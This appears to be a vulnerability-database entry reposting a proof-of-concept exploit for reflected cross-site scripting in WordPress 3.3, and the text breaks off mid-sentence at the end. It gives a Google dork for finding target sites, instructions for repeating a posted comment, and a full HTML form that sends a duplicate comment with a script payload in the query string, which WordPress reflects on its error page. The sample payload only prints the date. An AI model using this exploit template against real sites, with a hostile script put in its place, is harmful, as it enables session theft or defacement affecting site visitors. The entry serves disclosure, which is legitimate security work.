Reflected Cross-Site Scripting in WordPress 3.3

2012-01-03T00:00:00
ID SSV:30004
Type seebug
Reporter Root
Modified 2012-01-03T00:00:00

Description

No description provided by source.

# Exploit Title: Reflected Cross-Site Scripting in WordPress 3.3
# Google Dork: "Proudly powered by WordPress"
# Date: 2.1.2012
# Author: Aditya Modha, Samir Shah
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: Apache
# CVE : none assigned


Step 1: Post a comment to the target website.

Step 2: In the form below, replace the values of the author, email and
comment fields with exactly the values that were submitted in that comment
(the request must be byte-for-byte the same comment, otherwise WordPress will
not treat it as a duplicate). Set comment_post_ID to the ID of the post that
was commented on; it is the value of the p parameter in the post's URL. For
example, if the URL is http://192.168.1.102/wordpress/?p=6, then
comment_post_ID is 6.

<html>
<head>
<title>Wordpress 3.3 XSS PoC</title>
</head>
<body>
<!-- The payload is carried in the query string of the action URL; it is
     reflected by the error page WordPress returns for a duplicate comment. -->
<form name="XSS" id="XSS" method="POST"
      action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>">
<!-- author, email and comment must match the previously posted comment exactly -->
<input type="hidden" name="author" value="replace me">
<input type="hidden" name="email" value="replace me">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="replace me">
<input type="hidden" name="submit" value="Post Comment">
<!-- ID of the commented post: the p parameter of its URL (?p=6 gives 6) -->
<input type="hidden" name="comment_post_ID" value="replace me">
<input type="hidden" name="comment_parent" value="0">
<!-- type="submit" (not type="button") so that the click actually posts the form -->
<input type="submit" value="Click Me" />
</form>
</body>
</html>

Step 3: Publish the above HTML file on a web server and open it in the
browser. Click the "Click Me" button. This submits the same comment to
WordPress a second time; WordPress flags it as a duplicate and answers with a
500 Internal Server Error page, and it is on that error page, not in the
stored comment, that the XSS payload from the query string is reflected and
executed. Check